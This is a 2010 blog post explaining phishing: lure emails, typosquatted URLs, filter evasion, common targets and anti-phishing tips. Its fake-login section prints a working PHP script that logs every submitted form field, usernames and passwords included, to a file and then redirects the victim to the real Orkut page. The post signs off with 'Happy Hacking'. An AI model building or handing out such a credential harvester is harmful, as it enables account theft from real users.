Thursday, December 2, 2010

PHISHING

  • What is Phishing ?
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.


  • Phishing E-mail :
Phishing is typically carried out by e-mail or instant messaging. Phishing e-mail messages take a number of forms:

1. They might appear to come from your bank or financial institution, a company you regularly do business with, such as Microsoft, or from your social networking site.

2. Spear phishing is a targeted form of phishing in which an e-mail message might look like it comes from your employer, or from a colleague who might send an e-mail message to everyone in the company, such as the head of human resources or IT.

3. Phone phishing scams direct you to call a customer support phone number. A person or an audio response unit waits to take your account number, personal identification number, password, or other valuable personal data.

Here is an example of what a phishing scam in an e-mail message might look like.


  • Phishing Techniques :
1. Link Manipulation:

Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com
www.mircosoft.com
www.micorsoft.com

Another method of spoofing used links like: http://www.facebook.ripway.com/ actually this URL points to the facebook (i.e. fake login page ) section of the ripway website.

2. Filter Evasion:

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.

  • Fake Login Page :
Fake Login Page exactly looks like the original page of any website. But in the page source, the action field is replaced by a PHP script. This PHP serves two purposes:

Script Code:

<?php
header ('Location: http://www.orkut.com/Home.aspx ');
$handler = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>


1. First it captures the input data (username & password) and sends it to the attacker.

2. It redirects the victim to the original page to make him believe that the login is normal.


  • Phishing Targets :
1. Social networking sites like facebook, myspace, orkut now a prime target of phishing, since the personal details in such sites can be used in identity theft.

2. The RapidShare file sharing site has been targeted by phishing to obtain a premium account.

3. Almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network based in St. Petersburg.

4. eBay, PayPal and the other online banks are also targeted.




  • Anti Phishing Info :
1. Never assume that an email is valid based on the sender’s email address. The email may be forged.

2. A trusted bank such as CITIBANK will never ask you for your full name and password in a CITIBANK email.

3. An email from trusted organization will never contain attachments or software.

4. Always ensure that you're using a secure website when submitting credit card or other sensitive information.

5. Get in the habit of looking at the address line. Were you directed to PayPal? Or something different like http://www.yougotscammed.com/paypal/login.htm?



Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Posted by Rajat Das at 4:06 AM

No comments:

Post a Comment

If you like this post, comment please...

Subscribe to: Post Comments (Atom)